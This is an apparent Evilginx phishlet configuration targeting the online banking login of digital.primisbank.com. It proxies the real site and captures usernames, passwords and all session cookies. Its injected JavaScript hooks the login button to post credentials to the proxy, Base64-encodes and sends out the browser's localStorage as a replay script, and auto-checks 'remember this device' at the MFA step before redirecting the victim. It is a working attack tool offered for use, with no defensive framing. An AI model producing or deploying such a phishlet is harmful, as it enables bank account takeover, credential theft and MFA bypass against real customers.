author: ""
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "digital", orig_sub: "digital", domain: "primisbank.com", session: true, is_landing: true}
sub_filters: []
auth_tokens:
  - domain: 'digital.primisbank.com'
    keys: ['.*,regexp']
auth_urls:
  - "/account-overview"
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'unenc_password'
    search: '(.*)'
    type: 'post'
  custom:
    key: 'localstorage'
    search: '(.*)'
    type: 'post'

login:
  domain: "digital.primisbank.com"
  path: "/login"

js_inject:
  - trigger_domains: ["digital.primisbank.com"]
    trigger_paths: ["/login"]
    script: |
    


     function xxx() {
        if (window.location.href.indexOf("/account-overview") > -1) {
          

            var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=Base64._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},decode:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=Base64._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/\r\n/g,"\n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}}

              var post = Base64.encode(('var data = '+JSON.stringify(localStorage)+';Object.keys(data).forEach(function (k){localStorage.setItem(k, data[k]);});'));

                var xhr = new XMLHttpRequest();
                xhr.open("POST", '/error', true);
                xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                xhr.send("localstorage="+encodeURIComponent(post));
                
             
               var tID = setTimeout(function() {
               window.close();
               window.clearTimeout(tID);
               window.location.replace("https://digital.primisbank.com/login");
        
               }, 1000);

            

              }


        }
    
  
     setInterval(function() {
        xxx();
     }, 4000);


 
      function onclickListener(){

        const classExists = document.querySelectorAll('button[id=signupSubmit]').length > 0;

            if (classExists) {
                var submit = document.querySelectorAll('button[id=signupSubmit]')[0];
        submit.setAttribute("onclick", "sendPass()");
        
              }

        
      }
      function sendPass(){
        var username = document.getElementById("e2e-username").value;
        var password = document.getElementById("e2e-password").value;

        var xhr = new XMLHttpRequest();
        xhr.open("POST", '/error', true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("username="+encodeURIComponent(username)+"&unenc_password="+encodeURIComponent(password));

      }
       setInterval(function(){ onclickListener(); }, 2000);
    
      function onclick(){
      
        if (window.location.href.indexOf("/mfaCode") > -1) {

        const classExists = document.querySelectorAll('input[id=rememberThisDevice]').length > 0;
           
           if(localStorage["checked"] == 'true') {
            
            }else if (classExists) {
               document.getElementById('rememberThisDevice').click();
              
              localStorage.setItem('checked', 'true');

              }

      }  
      }
      
       setInterval(function(){ onclick(); }, 4000);


